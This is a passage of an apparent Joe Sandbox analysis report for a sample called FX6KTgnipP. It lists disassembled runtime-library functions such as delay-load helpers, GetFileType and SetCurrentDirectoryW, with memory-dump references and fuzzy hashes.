                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 897784432-0
                                                                                                                                                                            • Opcode ID: 9b79ed95ba8876f9adf2e6e9289e82591afb7c9dcc8965c0380c5c2d14cda8ef
                                                                                                                                                                            • Instruction ID: ff6fefe5407654fd80ebea395d5bcdc2fd5eba0827ca03cf19ccf46c2f303d5d
                                                                                                                                                                            • Opcode Fuzzy Hash: 9b79ed95ba8876f9adf2e6e9289e82591afb7c9dcc8965c0380c5c2d14cda8ef
                                                                                                                                                                            • Instruction Fuzzy Hash: B6D09E31154200AADA122B51DE0AF0A7AE6BB88B05F404555B745340F1C6629E71AF16
                                                                                                                                                                            Function 00264D2C Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00264DD5: RtlAcquireSRWLockExclusive.NTDLL ref: 00264DF2
                                                                                                                                                                            • DloadProtectSection.DELAYIMP ref: 00264D54
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AcquireDloadExclusiveLockProtectSection
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3680172570-0
                                                                                                                                                                            • Opcode ID: 483e694130309fe45e4ffe13130752be32532d6b28d8c905147f94b8530a0e04
                                                                                                                                                                            • Instruction ID: aa4f5f8bf27d2dc029ddc7facff9f9c27a3cf9dc9461155473b8a9a70e977e4f
                                                                                                                                                                            • Opcode Fuzzy Hash: 483e694130309fe45e4ffe13130752be32532d6b28d8c905147f94b8530a0e04
                                                                                                                                                                            • Instruction Fuzzy Hash: ACD0C978A205719EDB16BF24AC4E7542250B305B08F800646E3D5865A4CBA944F09B61
                                                                                                                                                                            Function 0024E152 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileType.KERNELBASE(000000FF,0024E052,?,?,?,00000000,0024E5D2,?,?,00000000,?,00000000), ref: 0024E15E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileType
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3081899298-0
                                                                                                                                                                            • Opcode ID: 0f174369baa784e8f7ff9f0f58b6038dd32ad06e93e079bac77538e6df702ebb
                                                                                                                                                                            • Instruction ID: 9248630f299fb6892065acebd39769e142dd0a14421feae55b38e900a6f5f687
                                                                                                                                                                            • Opcode Fuzzy Hash: 0f174369baa784e8f7ff9f0f58b6038dd32ad06e93e079bac77538e6df702ebb
                                                                                                                                                                            • Instruction Fuzzy Hash: 52C0023445020AD6AF294E38A88949D7622BA527A67B59798D02D895A1C3328CA7EB11
                                                                                                                                                                            Function 00264B62 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 66919d0d4f48cce8cd9000051da6e289cdf710dc34f785d6311df1cd47920c45
                                                                                                                                                                            • Instruction ID: 5b6d43fabb35bf96911764e12a95c7f095b1203bf29d7766b98fb468b4ff26ee
                                                                                                                                                                            • Opcode Fuzzy Hash: 66919d0d4f48cce8cd9000051da6e289cdf710dc34f785d6311df1cd47920c45
                                                                                                                                                                            • Instruction Fuzzy Hash: 12B0128527D000AC310471099E03D3B010CC1C1B14330D32AF440C1485D4808CF10131
                                                                                                                                                                            Function 00264B58 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: fca6c572df7262921121a3c9213c1f117595a36595fdc8ab93c40a18d30d9342
                                                                                                                                                                            • Instruction ID: e959cf091a968b587f8bf26c7b7a772a2b3e0de0eef4f3bdc8f5680aafc9754e
                                                                                                                                                                            • Opcode Fuzzy Hash: fca6c572df7262921121a3c9213c1f117595a36595fdc8ab93c40a18d30d9342
                                                                                                                                                                            • Instruction Fuzzy Hash: BFB0128527D100AC320471099D03D37010CC1C1B14330932AF440C14C5D4808CF40135
                                                                                                                                                                            Function 00264B8A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 5824bc8839c243102585055fc5ac4001b0146b784a3488e4c01d940768fef332
                                                                                                                                                                            • Instruction ID: 35f6f57a31b01e2f79b2ee1e72dcd57da0fb03e7ad21d8a21e64873f132a2af6
                                                                                                                                                                            • Opcode Fuzzy Hash: 5824bc8839c243102585055fc5ac4001b0146b784a3488e4c01d940768fef332
                                                                                                                                                                            • Instruction Fuzzy Hash: EEB0128527D110EC310471095D03D37010CC1C1B14330D22AF840C1585D4809CF00131
                                                                                                                                                                            Function 00264C7E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: effb08fe9106ef417de9b741e4dae6ceb556d38b648bc3028964ca96e77b64d1
                                                                                                                                                                            • Instruction ID: 7d30d582204a217a2b7db933f1895cb862fc8a64d76a690ca93183a35aa3634e
                                                                                                                                                                            • Opcode Fuzzy Hash: effb08fe9106ef417de9b741e4dae6ceb556d38b648bc3028964ca96e77b64d1
                                                                                                                                                                            • Instruction Fuzzy Hash: F7B012892BE000FC310831041F07C37010CC9D1B11331821BF440C048294804CF10031
                                                                                                                                                                            Function 00264CAD Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: e7a85dcf5ec7b5cfe0a9a9189318a8088fa1dd4482de6337828009724ebc88d0
                                                                                                                                                                            • Instruction ID: a3ccdfd3adfde8a667862610005eadd331743b2a144b96333e3bc7b4c6c9a4ad
                                                                                                                                                                            • Opcode Fuzzy Hash: e7a85dcf5ec7b5cfe0a9a9189318a8088fa1dd4482de6337828009724ebc88d0
                                                                                                                                                                            • Instruction Fuzzy Hash: B9B0128527E000EC310471145E03C37010CC1C1B10331812BF440C1581D4804CF50131
                                                                                                                                                                            Function 00264CB7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 98d15778029f77ecbf407e98b4fcd0e7d9fe9cf9b911d058f13e74bf73dd7450
                                                                                                                                                                            • Instruction ID: 88ca9eb405a334ba85e4c8ff2ec6c2ef8050dc294a6f3c6c6c3b51fbb5d2fdcd
                                                                                                                                                                            • Opcode Fuzzy Hash: 98d15778029f77ecbf407e98b4fcd0e7d9fe9cf9b911d058f13e74bf73dd7450
                                                                                                                                                                            • Instruction Fuzzy Hash: 96B0128527E001EC310471145D03D37010CC1C1B10331412BF440C1981D4804CF40131
                                                                                                                                                                            Function 00264C99 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 47fdaf657c36b019363b8b3d5d97bf9612b73ae5bd4ae998e51d57533fde4441
                                                                                                                                                                            • Instruction ID: 84e0c0e0c461df9eada6f2f1ea7cb14235eb77717bf977c5d66aab228eac9b4f
                                                                                                                                                                            • Opcode Fuzzy Hash: 47fdaf657c36b019363b8b3d5d97bf9612b73ae5bd4ae998e51d57533fde4441
                                                                                                                                                                            • Instruction Fuzzy Hash: 6AB0128527E000EC710471245D03C37010CC1C1B10331812BF840C1581D4804CF40131
                                                                                                                                                                            Function 00264D22 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264CF1
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 4eaf6c390e761c482db855168d4ff0144d5b0a5a3ba9be56d7aec04eb2621743
                                                                                                                                                                            • Instruction ID: 4d898f895e86b738028cbbcda2ed07bd46a743b4f73501794b7b07b960951031
                                                                                                                                                                            • Opcode Fuzzy Hash: 4eaf6c390e761c482db855168d4ff0144d5b0a5a3ba9be56d7aec04eb2621743
                                                                                                                                                                            • Instruction Fuzzy Hash: C4B0128927E002ED310473046D03C37010CD1C1B10330412BF444C1581D4804CF50131
                                                                                                                                                                            Function 00264D04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264CF1
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: b486c9f2dbe77b66124f4c581e14dddd0d81b9ee81c5a2b9a0ab6baac897a942
                                                                                                                                                                            • Instruction ID: 507afb648f22d4fa7568be6a3a35d9994d0467702555133eb58d962c0806bfae
                                                                                                                                                                            • Opcode Fuzzy Hash: b486c9f2dbe77b66124f4c581e14dddd0d81b9ee81c5a2b9a0ab6baac897a942
                                                                                                                                                                            • Instruction Fuzzy Hash: B1B0128927E101ED324473046D03C37010CC1C1B10330422BF444C1181D4814CF50131
                                                                                                                                                                            Function 00264D18 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264CF1
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: dec5b46dfc565dd609f7c4675a2235ac5d2b5154c0b5440599f7ca025aa96fd9
                                                                                                                                                                            • Instruction ID: 225a7ad03bb597a31f49d9ecd23dbcb0226543d4b712ceaf80e7fdbf0d876378
                                                                                                                                                                            • Opcode Fuzzy Hash: dec5b46dfc565dd609f7c4675a2235ac5d2b5154c0b5440599f7ca025aa96fd9
                                                                                                                                                                            • Instruction Fuzzy Hash: 50B0128927E001FD310473041D03C37010CC1C2B10330811BF844C2185D4804CF80131
                                                                                                                                                                            Function 00252226 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?), ref: 00252233
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1611563598-0
                                                                                                                                                                            • Opcode ID: d18aa07d201661da94051ba8b11e185f25d7dcaa626deee23c8d8a4eb59d80bc
                                                                                                                                                                            • Instruction ID: 356c32adfb446451f87034215aec8dbcfb7337bc0e70e0b8814dbd1be5b7f022
                                                                                                                                                                            • Opcode Fuzzy Hash: d18aa07d201661da94051ba8b11e185f25d7dcaa626deee23c8d8a4eb59d80bc
                                                                                                                                                                            • Instruction Fuzzy Hash: 92C04C70215200DF8704CF74DA8DA0A77EABF62706B518468F844CB060C734DC64DE65
                                                                                                                                                                            Function 00264B2E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
